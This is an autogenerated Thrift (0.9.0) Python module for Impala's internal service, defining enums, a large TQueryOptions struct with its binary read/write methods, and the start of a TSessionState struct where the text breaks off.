# # Autogenerated by Thrift Compiler (0.9.0) # # DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING # # options string: py # from thrift.Thrift import TType, TMessageType, TException, TApplicationException import Status.ttypes import ErrorCodes.ttypes import Types.ttypes import Exprs.ttypes import CatalogObjects.ttypes import Descriptors.ttypes import PlanNodes.ttypes import Planner.ttypes import DataSinks.ttypes import Results.ttypes import RuntimeProfile.ttypes import ImpalaService.ttypes import Data.ttypes from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol, TProtocol try: from thrift.protocol import fastbinary except: fastbinary = None class TParquetFallbackSchemaResolution: POSITION = 0 NAME = 1 _VALUES_TO_NAMES = { 0: "POSITION", 1: "NAME", } _NAMES_TO_VALUES = { "POSITION": 0, "NAME": 1, } class TParquetArrayResolution: THREE_LEVEL = 0 TWO_LEVEL = 1 TWO_LEVEL_THEN_THREE_LEVEL = 2 _VALUES_TO_NAMES = { 0: "THREE_LEVEL", 1: "TWO_LEVEL", 2: "TWO_LEVEL_THEN_THREE_LEVEL", } _NAMES_TO_VALUES = { "THREE_LEVEL": 0, "TWO_LEVEL": 1, "TWO_LEVEL_THEN_THREE_LEVEL": 2, } class TJoinDistributionMode: BROADCAST = 0 SHUFFLE = 1 _VALUES_TO_NAMES = { 0: "BROADCAST", 1: "SHUFFLE", } _NAMES_TO_VALUES = { "BROADCAST": 0, "SHUFFLE": 1, } class TSessionType: BEESWAX = 0 HIVESERVER2 = 1 _VALUES_TO_NAMES = { 0: "BEESWAX", 1: "HIVESERVER2", } _NAMES_TO_VALUES = { "BEESWAX": 0, "HIVESERVER2": 1, } class ImpalaInternalServiceVersion: V1 = 0 _VALUES_TO_NAMES = { 0: "V1", } _NAMES_TO_VALUES = { "V1": 0, } class TQueryOptions: """ Attributes: - abort_on_error - max_errors - disable_codegen - batch_size - num_nodes - max_scan_range_length - num_scanner_threads - max_io_buffers - allow_unsupported_formats - default_order_by_limit - debug_action - mem_limit - abort_on_default_limit_exceeded - compression_codec - hbase_caching - hbase_cache_blocks - parquet_file_size - explain_level - sync_ddl - request_pool - v_cpu_cores - reservation_request_timeout - disable_cached_reads - disable_outermost_topn - rm_initial_mem - query_timeout_s - buffer_pool_limit - appx_count_distinct - disable_unsafe_spills - seq_compression_mode - exec_single_node_rows_threshold - optimize_partition_key_scans - replica_preference - schedule_random_replica - scan_node_codegen_threshold - disable_streaming_preaggregations - runtime_filter_mode - runtime_bloom_filter_size - runtime_filter_wait_time_ms - disable_row_runtime_filtering - max_num_runtime_filters - parquet_annotate_strings_utf8 - parquet_fallback_schema_resolution - mt_dop - s3_skip_insert_staging - runtime_filter_min_size - runtime_filter_max_size - prefetch_mode - strict_mode - scratch_limit - enable_expr_rewrites - decimal_v2 - parquet_dictionary_filtering - parquet_array_resolution - parquet_read_statistics - default_join_distribution_mode - disable_codegen_rows_threshold - default_spillable_buffer_size - min_spillable_buffer_size - max_row_size """ thrift_spec = ( None, # 0 (1, TType.BOOL, 'abort_on_error', None, False, ), # 1 (2, TType.I32, 'max_errors', None, 100, ), # 2 (3, TType.BOOL, 'disable_codegen', None, False, ), # 3 (4, TType.I32, 'batch_size', None, 0, ), # 4 (5, TType.I32, 'num_nodes', None, 0, ), # 5 (6, TType.I64, 'max_scan_range_length', None, 0, ), # 6 (7, TType.I32, 'num_scanner_threads', None, 0, ), # 7 (8, TType.I32, 'max_io_buffers', None, 0, ), # 8 (9, TType.BOOL, 'allow_unsupported_formats', None, False, ), # 9 (10, TType.I64, 'default_order_by_limit', None, -1, ), # 10 (11, TType.STRING, 'debug_action', None, "", ), # 11 (12, TType.I64, 'mem_limit', None, 0, ), # 12 (13, TType.BOOL, 'abort_on_default_limit_exceeded', None, False, ), # 13 (14, TType.I32, 'compression_codec', None, None, ), # 14 (15, TType.I32, 'hbase_caching', None, 0, ), # 15 (16, TType.BOOL, 'hbase_cache_blocks', None, False, ), # 16 (17, TType.I64, 'parquet_file_size', None, 0, ), # 17 (18, TType.I32, 'explain_level', None, 1, ), # 18 (19, TType.BOOL, 'sync_ddl', None, False, ), # 19 (20, TType.STRING, 'request_pool', None, None, ), # 20 (21, TType.I16, 'v_cpu_cores', None, None, ), # 21 (22, TType.I64, 'reservation_request_timeout', None, None, ), # 22 (23, TType.BOOL, 'disable_cached_reads', None, False, ), # 23 (24, TType.BOOL, 'disable_outermost_topn', None, False, ), # 24 (25, TType.I64, 'rm_initial_mem', None, 0, ), # 25 (26, TType.I32, 'query_timeout_s', None, 0, ), # 26 (27, TType.I64, 'buffer_pool_limit', None, None, ), # 27 (28, TType.BOOL, 'appx_count_distinct', None, False, ), # 28 (29, TType.BOOL, 'disable_unsafe_spills', None, False, ), # 29 (30, TType.I32, 'seq_compression_mode', None, None, ), # 30 (31, TType.I32, 'exec_single_node_rows_threshold', None, 100, ), # 31 (32, TType.BOOL, 'optimize_partition_key_scans', None, False, ), # 32 (33, TType.I32, 'replica_preference', None, 0, ), # 33 (34, TType.BOOL, 'schedule_random_replica', None, False, ), # 34 (35, TType.I64, 'scan_node_codegen_threshold', None, 1800000, ), # 35 (36, TType.BOOL, 'disable_streaming_preaggregations', None, False, ), # 36 (37, TType.I32, 'runtime_filter_mode', None, 2, ), # 37 (38, TType.I32, 'runtime_bloom_filter_size', None, 1048576, ), # 38 (39, TType.I32, 'runtime_filter_wait_time_ms', None, 0, ), # 39 (40, TType.BOOL, 'disable_row_runtime_filtering', None, False, ), # 40 (41, TType.I32, 'max_num_runtime_filters', None, 10, ), # 41 (42, TType.BOOL, 'parquet_annotate_strings_utf8', None, False, ), # 42 (43, TType.I32, 'parquet_fallback_schema_resolution', None, 0, ), # 43 (44, TType.I32, 'mt_dop', None, None, ), # 44 (45, TType.BOOL, 's3_skip_insert_staging', None, True, ), # 45 (46, TType.I32, 'runtime_filter_min_size', None, 1048576, ), # 46 (47, TType.I32, 'runtime_filter_max_size', None, 16777216, ), # 47 (48, TType.I32, 'prefetch_mode', None, 1, ), # 48 (49, TType.BOOL, 'strict_mode', None, False, ), # 49 (50, TType.I64, 'scratch_limit', None, -1, ), # 50 (51, TType.BOOL, 'enable_expr_rewrites', None, True, ), # 51 (52, TType.BOOL, 'decimal_v2', None, False, ), # 52 (53, TType.BOOL, 'parquet_dictionary_filtering', None, True, ), # 53 (54, TType.I32, 'parquet_array_resolution', None, 2, ), # 54 (55, TType.BOOL, 'parquet_read_statistics', None, True, ), # 55 (56, TType.I32, 'default_join_distribution_mode', None, 0, ), # 56 (57, TType.I32, 'disable_codegen_rows_threshold', None, 50000, ), # 57 (58, TType.I64, 'default_spillable_buffer_size', None, 2097152, ), # 58 (59, TType.I64, 'min_spillable_buffer_size', None, 65536, ), # 59 (60, TType.I64, 'max_row_size', None, 524288, ), # 60 ) def __init__(self, abort_on_error=thrift_spec[1][4], max_errors=thrift_spec[2][4], disable_codegen=thrift_spec[3][4], batch_size=thrift_spec[4][4], num_nodes=thrift_spec[5][4], max_scan_range_length=thrift_spec[6][4], num_scanner_threads=thrift_spec[7][4], max_io_buffers=thrift_spec[8][4], allow_unsupported_formats=thrift_spec[9][4], default_order_by_limit=thrift_spec[10][4], debug_action=thrift_spec[11][4], mem_limit=thrift_spec[12][4], abort_on_default_limit_exceeded=thrift_spec[13][4], compression_codec=None, hbase_caching=thrift_spec[15][4], hbase_cache_blocks=thrift_spec[16][4], parquet_file_size=thrift_spec[17][4], explain_level=thrift_spec[18][4], sync_ddl=thrift_spec[19][4], request_pool=None, v_cpu_cores=None, reservation_request_timeout=None, disable_cached_reads=thrift_spec[23][4], disable_outermost_topn=thrift_spec[24][4], rm_initial_mem=thrift_spec[25][4], query_timeout_s=thrift_spec[26][4], buffer_pool_limit=None, appx_count_distinct=thrift_spec[28][4], disable_unsafe_spills=thrift_spec[29][4], seq_compression_mode=None, exec_single_node_rows_threshold=thrift_spec[31][4], optimize_partition_key_scans=thrift_spec[32][4], replica_preference=thrift_spec[33][4], schedule_random_replica=thrift_spec[34][4], scan_node_codegen_threshold=thrift_spec[35][4], disable_streaming_preaggregations=thrift_spec[36][4], runtime_filter_mode=thrift_spec[37][4], runtime_bloom_filter_size=thrift_spec[38][4], runtime_filter_wait_time_ms=thrift_spec[39][4], disable_row_runtime_filtering=thrift_spec[40][4], max_num_runtime_filters=thrift_spec[41][4], parquet_annotate_strings_utf8=thrift_spec[42][4], parquet_fallback_schema_resolution=thrift_spec[43][4], mt_dop=None, s3_skip_insert_staging=thrift_spec[45][4], runtime_filter_min_size=thrift_spec[46][4], runtime_filter_max_size=thrift_spec[47][4], prefetch_mode=thrift_spec[48][4], strict_mode=thrift_spec[49][4], scratch_limit=thrift_spec[50][4], enable_expr_rewrites=thrift_spec[51][4], decimal_v2=thrift_spec[52][4], parquet_dictionary_filtering=thrift_spec[53][4], parquet_array_resolution=thrift_spec[54][4], parquet_read_statistics=thrift_spec[55][4], default_join_distribution_mode=thrift_spec[56][4], disable_codegen_rows_threshold=thrift_spec[57][4], default_spillable_buffer_size=thrift_spec[58][4], min_spillable_buffer_size=thrift_spec[59][4], max_row_size=thrift_spec[60][4],): self.abort_on_error = abort_on_error self.max_errors = max_errors self.disable_codegen = disable_codegen self.batch_size = batch_size self.num_nodes = num_nodes self.max_scan_range_length = max_scan_range_length self.num_scanner_threads = num_scanner_threads self.max_io_buffers = max_io_buffers self.allow_unsupported_formats = allow_unsupported_formats self.default_order_by_limit = default_order_by_limit self.debug_action = debug_action self.mem_limit = mem_limit self.abort_on_default_limit_exceeded = abort_on_default_limit_exceeded self.compression_codec = compression_codec self.hbase_caching = hbase_caching self.hbase_cache_blocks = hbase_cache_blocks self.parquet_file_size = parquet_file_size self.explain_level = explain_level self.sync_ddl = sync_ddl self.request_pool = request_pool self.v_cpu_cores = v_cpu_cores self.reservation_request_timeout = reservation_request_timeout self.disable_cached_reads = disable_cached_reads self.disable_outermost_topn = disable_outermost_topn self.rm_initial_mem = rm_initial_mem self.query_timeout_s = query_timeout_s self.buffer_pool_limit = buffer_pool_limit self.appx_count_distinct = appx_count_distinct self.disable_unsafe_spills = disable_unsafe_spills self.seq_compression_mode = seq_compression_mode self.exec_single_node_rows_threshold = exec_single_node_rows_threshold self.optimize_partition_key_scans = optimize_partition_key_scans self.replica_preference = replica_preference self.schedule_random_replica = schedule_random_replica self.scan_node_codegen_threshold = scan_node_codegen_threshold self.disable_streaming_preaggregations = disable_streaming_preaggregations self.runtime_filter_mode = runtime_filter_mode self.runtime_bloom_filter_size = runtime_bloom_filter_size self.runtime_filter_wait_time_ms = runtime_filter_wait_time_ms self.disable_row_runtime_filtering = disable_row_runtime_filtering self.max_num_runtime_filters = max_num_runtime_filters self.parquet_annotate_strings_utf8 = parquet_annotate_strings_utf8 self.parquet_fallback_schema_resolution = parquet_fallback_schema_resolution self.mt_dop = mt_dop self.s3_skip_insert_staging = s3_skip_insert_staging self.runtime_filter_min_size = runtime_filter_min_size self.runtime_filter_max_size = runtime_filter_max_size self.prefetch_mode = prefetch_mode self.strict_mode = strict_mode self.scratch_limit = scratch_limit self.enable_expr_rewrites = enable_expr_rewrites self.decimal_v2 = decimal_v2 self.parquet_dictionary_filtering = parquet_dictionary_filtering self.parquet_array_resolution = parquet_array_resolution self.parquet_read_statistics = parquet_read_statistics self.default_join_distribution_mode = default_join_distribution_mode self.disable_codegen_rows_threshold = disable_codegen_rows_threshold self.default_spillable_buffer_size = default_spillable_buffer_size self.min_spillable_buffer_size = min_spillable_buffer_size self.max_row_size = max_row_size def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.BOOL: self.abort_on_error = iprot.readBool(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.max_errors = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.BOOL: self.disable_codegen = iprot.readBool(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I32: self.batch_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.num_nodes = iprot.readI32(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.I64: self.max_scan_range_length = iprot.readI64(); else: iprot.skip(ftype) elif fid == 7: if ftype == TType.I32: self.num_scanner_threads = iprot.readI32(); else: iprot.skip(ftype) elif fid == 8: if ftype == TType.I32: self.max_io_buffers = iprot.readI32(); else: iprot.skip(ftype) elif fid == 9: if ftype == TType.BOOL: self.allow_unsupported_formats = iprot.readBool(); else: iprot.skip(ftype) elif fid == 10: if ftype == TType.I64: self.default_order_by_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 11: if ftype == TType.STRING: self.debug_action = iprot.readString(); else: iprot.skip(ftype) elif fid == 12: if ftype == TType.I64: self.mem_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 13: if ftype == TType.BOOL: self.abort_on_default_limit_exceeded = iprot.readBool(); else: iprot.skip(ftype) elif fid == 14: if ftype == TType.I32: self.compression_codec = iprot.readI32(); else: iprot.skip(ftype) elif fid == 15: if ftype == TType.I32: self.hbase_caching = iprot.readI32(); else: iprot.skip(ftype) elif fid == 16: if ftype == TType.BOOL: self.hbase_cache_blocks = iprot.readBool(); else: iprot.skip(ftype) elif fid == 17: if ftype == TType.I64: self.parquet_file_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 18: if ftype == TType.I32: self.explain_level = iprot.readI32(); else: iprot.skip(ftype) elif fid == 19: if ftype == TType.BOOL: self.sync_ddl = iprot.readBool(); else: iprot.skip(ftype) elif fid == 20: if ftype == TType.STRING: self.request_pool = iprot.readString(); else: iprot.skip(ftype) elif fid == 21: if ftype == TType.I16: self.v_cpu_cores = iprot.readI16(); else: iprot.skip(ftype) elif fid == 22: if ftype == TType.I64: self.reservation_request_timeout = iprot.readI64(); else: iprot.skip(ftype) elif fid == 23: if ftype == TType.BOOL: self.disable_cached_reads = iprot.readBool(); else: iprot.skip(ftype) elif fid == 24: if ftype == TType.BOOL: self.disable_outermost_topn = iprot.readBool(); else: iprot.skip(ftype) elif fid == 25: if ftype == TType.I64: self.rm_initial_mem = iprot.readI64(); else: iprot.skip(ftype) elif fid == 26: if ftype == TType.I32: self.query_timeout_s = iprot.readI32(); else: iprot.skip(ftype) elif fid == 27: if ftype == TType.I64: self.buffer_pool_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 28: if ftype == TType.BOOL: self.appx_count_distinct = iprot.readBool(); else: iprot.skip(ftype) elif fid == 29: if ftype == TType.BOOL: self.disable_unsafe_spills = iprot.readBool(); else: iprot.skip(ftype) elif fid == 30: if ftype == TType.I32: self.seq_compression_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 31: if ftype == TType.I32: self.exec_single_node_rows_threshold = iprot.readI32(); else: iprot.skip(ftype) elif fid == 32: if ftype == TType.BOOL: self.optimize_partition_key_scans = iprot.readBool(); else: iprot.skip(ftype) elif fid == 33: if ftype == TType.I32: self.replica_preference = iprot.readI32(); else: iprot.skip(ftype) elif fid == 34: if ftype == TType.BOOL: self.schedule_random_replica = iprot.readBool(); else: iprot.skip(ftype) elif fid == 35: if ftype == TType.I64: self.scan_node_codegen_threshold = iprot.readI64(); else: iprot.skip(ftype) elif fid == 36: if ftype == TType.BOOL: self.disable_streaming_preaggregations = iprot.readBool(); else: iprot.skip(ftype) elif fid == 37: if ftype == TType.I32: self.runtime_filter_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 38: if ftype == TType.I32: self.runtime_bloom_filter_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 39: if ftype == TType.I32: self.runtime_filter_wait_time_ms = iprot.readI32(); else: iprot.skip(ftype) elif fid == 40: if ftype == TType.BOOL: self.disable_row_runtime_filtering = iprot.readBool(); else: iprot.skip(ftype) elif fid == 41: if ftype == TType.I32: self.max_num_runtime_filters = iprot.readI32(); else: iprot.skip(ftype) elif fid == 42: if ftype == TType.BOOL: self.parquet_annotate_strings_utf8 = iprot.readBool(); else: iprot.skip(ftype) elif fid == 43: if ftype == TType.I32: self.parquet_fallback_schema_resolution = iprot.readI32(); else: iprot.skip(ftype) elif fid == 44: if ftype == TType.I32: self.mt_dop = iprot.readI32(); else: iprot.skip(ftype) elif fid == 45: if ftype == TType.BOOL: self.s3_skip_insert_staging = iprot.readBool(); else: iprot.skip(ftype) elif fid == 46: if ftype == TType.I32: self.runtime_filter_min_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 47: if ftype == TType.I32: self.runtime_filter_max_size = iprot.readI32(); else: iprot.skip(ftype) elif fid == 48: if ftype == TType.I32: self.prefetch_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 49: if ftype == TType.BOOL: self.strict_mode = iprot.readBool(); else: iprot.skip(ftype) elif fid == 50: if ftype == TType.I64: self.scratch_limit = iprot.readI64(); else: iprot.skip(ftype) elif fid == 51: if ftype == TType.BOOL: self.enable_expr_rewrites = iprot.readBool(); else: iprot.skip(ftype) elif fid == 52: if ftype == TType.BOOL: self.decimal_v2 = iprot.readBool(); else: iprot.skip(ftype) elif fid == 53: if ftype == TType.BOOL: self.parquet_dictionary_filtering = iprot.readBool(); else: iprot.skip(ftype) elif fid == 54: if ftype == TType.I32: self.parquet_array_resolution = iprot.readI32(); else: iprot.skip(ftype) elif fid == 55: if ftype == TType.BOOL: self.parquet_read_statistics = iprot.readBool(); else: iprot.skip(ftype) elif fid == 56: if ftype == TType.I32: self.default_join_distribution_mode = iprot.readI32(); else: iprot.skip(ftype) elif fid == 57: if ftype == TType.I32: self.disable_codegen_rows_threshold = iprot.readI32(); else: iprot.skip(ftype) elif fid == 58: if ftype == TType.I64: self.default_spillable_buffer_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 59: if ftype == TType.I64: self.min_spillable_buffer_size = iprot.readI64(); else: iprot.skip(ftype) elif fid == 60: if ftype == TType.I64: self.max_row_size = iprot.readI64(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TQueryOptions') if self.abort_on_error is not None: oprot.writeFieldBegin('abort_on_error', TType.BOOL, 1) oprot.writeBool(self.abort_on_error) oprot.writeFieldEnd() if self.max_errors is not None: oprot.writeFieldBegin('max_errors', TType.I32, 2) oprot.writeI32(self.max_errors) oprot.writeFieldEnd() if self.disable_codegen is not None: oprot.writeFieldBegin('disable_codegen', TType.BOOL, 3) oprot.writeBool(self.disable_codegen) oprot.writeFieldEnd() if self.batch_size is not None: oprot.writeFieldBegin('batch_size', TType.I32, 4) oprot.writeI32(self.batch_size) oprot.writeFieldEnd() if self.num_nodes is not None: oprot.writeFieldBegin('num_nodes', TType.I32, 5) oprot.writeI32(self.num_nodes) oprot.writeFieldEnd() if self.max_scan_range_length is not None: oprot.writeFieldBegin('max_scan_range_length', TType.I64, 6) oprot.writeI64(self.max_scan_range_length) oprot.writeFieldEnd() if self.num_scanner_threads is not None: oprot.writeFieldBegin('num_scanner_threads', TType.I32, 7) oprot.writeI32(self.num_scanner_threads) oprot.writeFieldEnd() if self.max_io_buffers is not None: oprot.writeFieldBegin('max_io_buffers', TType.I32, 8) oprot.writeI32(self.max_io_buffers) oprot.writeFieldEnd() if self.allow_unsupported_formats is not None: oprot.writeFieldBegin('allow_unsupported_formats', TType.BOOL, 9) oprot.writeBool(self.allow_unsupported_formats) oprot.writeFieldEnd() if self.default_order_by_limit is not None: oprot.writeFieldBegin('default_order_by_limit', TType.I64, 10) oprot.writeI64(self.default_order_by_limit) oprot.writeFieldEnd() if self.debug_action is not None: oprot.writeFieldBegin('debug_action', TType.STRING, 11) oprot.writeString(self.debug_action) oprot.writeFieldEnd() if self.mem_limit is not None: oprot.writeFieldBegin('mem_limit', TType.I64, 12) oprot.writeI64(self.mem_limit) oprot.writeFieldEnd() if self.abort_on_default_limit_exceeded is not None: oprot.writeFieldBegin('abort_on_default_limit_exceeded', TType.BOOL, 13) oprot.writeBool(self.abort_on_default_limit_exceeded) oprot.writeFieldEnd() if self.compression_codec is not None: oprot.writeFieldBegin('compression_codec', TType.I32, 14) oprot.writeI32(self.compression_codec) oprot.writeFieldEnd() if self.hbase_caching is not None: oprot.writeFieldBegin('hbase_caching', TType.I32, 15) oprot.writeI32(self.hbase_caching) oprot.writeFieldEnd() if self.hbase_cache_blocks is not None: oprot.writeFieldBegin('hbase_cache_blocks', TType.BOOL, 16) oprot.writeBool(self.hbase_cache_blocks) oprot.writeFieldEnd() if self.parquet_file_size is not None: oprot.writeFieldBegin('parquet_file_size', TType.I64, 17) oprot.writeI64(self.parquet_file_size) oprot.writeFieldEnd() if self.explain_level is not None: oprot.writeFieldBegin('explain_level', TType.I32, 18) oprot.writeI32(self.explain_level) oprot.writeFieldEnd() if self.sync_ddl is not None: oprot.writeFieldBegin('sync_ddl', TType.BOOL, 19) oprot.writeBool(self.sync_ddl) oprot.writeFieldEnd() if self.request_pool is not None: oprot.writeFieldBegin('request_pool', TType.STRING, 20) oprot.writeString(self.request_pool) oprot.writeFieldEnd() if self.v_cpu_cores is not None: oprot.writeFieldBegin('v_cpu_cores', TType.I16, 21) oprot.writeI16(self.v_cpu_cores) oprot.writeFieldEnd() if self.reservation_request_timeout is not None: oprot.writeFieldBegin('reservation_request_timeout', TType.I64, 22) oprot.writeI64(self.reservation_request_timeout) oprot.writeFieldEnd() if self.disable_cached_reads is not None: oprot.writeFieldBegin('disable_cached_reads', TType.BOOL, 23) oprot.writeBool(self.disable_cached_reads) oprot.writeFieldEnd() if self.disable_outermost_topn is not None: oprot.writeFieldBegin('disable_outermost_topn', TType.BOOL, 24) oprot.writeBool(self.disable_outermost_topn) oprot.writeFieldEnd() if self.rm_initial_mem is not None: oprot.writeFieldBegin('rm_initial_mem', TType.I64, 25) oprot.writeI64(self.rm_initial_mem) oprot.writeFieldEnd() if self.query_timeout_s is not None: oprot.writeFieldBegin('query_timeout_s', TType.I32, 26) oprot.writeI32(self.query_timeout_s) oprot.writeFieldEnd() if self.buffer_pool_limit is not None: oprot.writeFieldBegin('buffer_pool_limit', TType.I64, 27) oprot.writeI64(self.buffer_pool_limit) oprot.writeFieldEnd() if self.appx_count_distinct is not None: oprot.writeFieldBegin('appx_count_distinct', TType.BOOL, 28) oprot.writeBool(self.appx_count_distinct) oprot.writeFieldEnd() if self.disable_unsafe_spills is not None: oprot.writeFieldBegin('disable_unsafe_spills', TType.BOOL, 29) oprot.writeBool(self.disable_unsafe_spills) oprot.writeFieldEnd() if self.seq_compression_mode is not None: oprot.writeFieldBegin('seq_compression_mode', TType.I32, 30) oprot.writeI32(self.seq_compression_mode) oprot.writeFieldEnd() if self.exec_single_node_rows_threshold is not None: oprot.writeFieldBegin('exec_single_node_rows_threshold', TType.I32, 31) oprot.writeI32(self.exec_single_node_rows_threshold) oprot.writeFieldEnd() if self.optimize_partition_key_scans is not None: oprot.writeFieldBegin('optimize_partition_key_scans', TType.BOOL, 32) oprot.writeBool(self.optimize_partition_key_scans) oprot.writeFieldEnd() if self.replica_preference is not None: oprot.writeFieldBegin('replica_preference', TType.I32, 33) oprot.writeI32(self.replica_preference) oprot.writeFieldEnd() if self.schedule_random_replica is not None: oprot.writeFieldBegin('schedule_random_replica', TType.BOOL, 34) oprot.writeBool(self.schedule_random_replica) oprot.writeFieldEnd() if self.scan_node_codegen_threshold is not None: oprot.writeFieldBegin('scan_node_codegen_threshold', TType.I64, 35) oprot.writeI64(self.scan_node_codegen_threshold) oprot.writeFieldEnd() if self.disable_streaming_preaggregations is not None: oprot.writeFieldBegin('disable_streaming_preaggregations', TType.BOOL, 36) oprot.writeBool(self.disable_streaming_preaggregations) oprot.writeFieldEnd() if self.runtime_filter_mode is not None: oprot.writeFieldBegin('runtime_filter_mode', TType.I32, 37) oprot.writeI32(self.runtime_filter_mode) oprot.writeFieldEnd() if self.runtime_bloom_filter_size is not None: oprot.writeFieldBegin('runtime_bloom_filter_size', TType.I32, 38) oprot.writeI32(self.runtime_bloom_filter_size) oprot.writeFieldEnd() if self.runtime_filter_wait_time_ms is not None: oprot.writeFieldBegin('runtime_filter_wait_time_ms', TType.I32, 39) oprot.writeI32(self.runtime_filter_wait_time_ms) oprot.writeFieldEnd() if self.disable_row_runtime_filtering is not None: oprot.writeFieldBegin('disable_row_runtime_filtering', TType.BOOL, 40) oprot.writeBool(self.disable_row_runtime_filtering) oprot.writeFieldEnd() if self.max_num_runtime_filters is not None: oprot.writeFieldBegin('max_num_runtime_filters', TType.I32, 41) oprot.writeI32(self.max_num_runtime_filters) oprot.writeFieldEnd() if self.parquet_annotate_strings_utf8 is not None: oprot.writeFieldBegin('parquet_annotate_strings_utf8', TType.BOOL, 42) oprot.writeBool(self.parquet_annotate_strings_utf8) oprot.writeFieldEnd() if self.parquet_fallback_schema_resolution is not None: oprot.writeFieldBegin('parquet_fallback_schema_resolution', TType.I32, 43) oprot.writeI32(self.parquet_fallback_schema_resolution) oprot.writeFieldEnd() if self.mt_dop is not None: oprot.writeFieldBegin('mt_dop', TType.I32, 44) oprot.writeI32(self.mt_dop) oprot.writeFieldEnd() if self.s3_skip_insert_staging is not None: oprot.writeFieldBegin('s3_skip_insert_staging', TType.BOOL, 45) oprot.writeBool(self.s3_skip_insert_staging) oprot.writeFieldEnd() if self.runtime_filter_min_size is not None: oprot.writeFieldBegin('runtime_filter_min_size', TType.I32, 46) oprot.writeI32(self.runtime_filter_min_size) oprot.writeFieldEnd() if self.runtime_filter_max_size is not None: oprot.writeFieldBegin('runtime_filter_max_size', TType.I32, 47) oprot.writeI32(self.runtime_filter_max_size) oprot.writeFieldEnd() if self.prefetch_mode is not None: oprot.writeFieldBegin('prefetch_mode', TType.I32, 48) oprot.writeI32(self.prefetch_mode) oprot.writeFieldEnd() if self.strict_mode is not None: oprot.writeFieldBegin('strict_mode', TType.BOOL, 49) oprot.writeBool(self.strict_mode) oprot.writeFieldEnd() if self.scratch_limit is not None: oprot.writeFieldBegin('scratch_limit', TType.I64, 50) oprot.writeI64(self.scratch_limit) oprot.writeFieldEnd() if self.enable_expr_rewrites is not None: oprot.writeFieldBegin('enable_expr_rewrites', TType.BOOL, 51) oprot.writeBool(self.enable_expr_rewrites) oprot.writeFieldEnd() if self.decimal_v2 is not None: oprot.writeFieldBegin('decimal_v2', TType.BOOL, 52) oprot.writeBool(self.decimal_v2) oprot.writeFieldEnd() if self.parquet_dictionary_filtering is not None: oprot.writeFieldBegin('parquet_dictionary_filtering', TType.BOOL, 53) oprot.writeBool(self.parquet_dictionary_filtering) oprot.writeFieldEnd() if self.parquet_array_resolution is not None: oprot.writeFieldBegin('parquet_array_resolution', TType.I32, 54) oprot.writeI32(self.parquet_array_resolution) oprot.writeFieldEnd() if self.parquet_read_statistics is not None: oprot.writeFieldBegin('parquet_read_statistics', TType.BOOL, 55) oprot.writeBool(self.parquet_read_statistics) oprot.writeFieldEnd() if self.default_join_distribution_mode is not None: oprot.writeFieldBegin('default_join_distribution_mode', TType.I32, 56) oprot.writeI32(self.default_join_distribution_mode) oprot.writeFieldEnd() if self.disable_codegen_rows_threshold is not None: oprot.writeFieldBegin('disable_codegen_rows_threshold', TType.I32, 57) oprot.writeI32(self.disable_codegen_rows_threshold) oprot.writeFieldEnd() if self.default_spillable_buffer_size is not None: oprot.writeFieldBegin('default_spillable_buffer_size', TType.I64, 58) oprot.writeI64(self.default_spillable_buffer_size) oprot.writeFieldEnd() if self.min_spillable_buffer_size is not None: oprot.writeFieldBegin('min_spillable_buffer_size', TType.I64, 59) oprot.writeI64(self.min_spillable_buffer_size) oprot.writeFieldEnd() if self.max_row_size is not None: oprot.writeFieldBegin('max_row_size', TType.I64, 60) oprot.writeI64(self.max_row_size) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TSessionState: """ Attributes: - session_id - session_type - database - connected_user - delegated_user - network_address - kudu_latest_observed_ts """ thrift_spec = ( None, # 0 (1, TType.STRING, 'database', None, None, ), # 1 (2, TType.STRING, 'connected_user', None, None, ), # 2 (3, TType.STRUCT, 'session_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.STRUCT, 'network_address', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 4 (5, TType.I32, 'session_type', None, None, ), # 5 (6, TType.STRING, 'delegated_user', None, None, ), # 6 (7, TType.I64, 'kudu_latest_observed_ts', None, None, ), # 7 ) def __init__(self, session_id=None, session_type=None, database=None, connected_user=None, delegated_user=None, network_address=None, kudu_latest_observed_ts=None,): self.session_id = session_id self.session_type = session_type self.database = database self.connected_user = connected_user self.delegated_user = delegated_user self.network_address = network_address self.kudu_latest_observed_ts = kudu_latest_observed_ts def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return 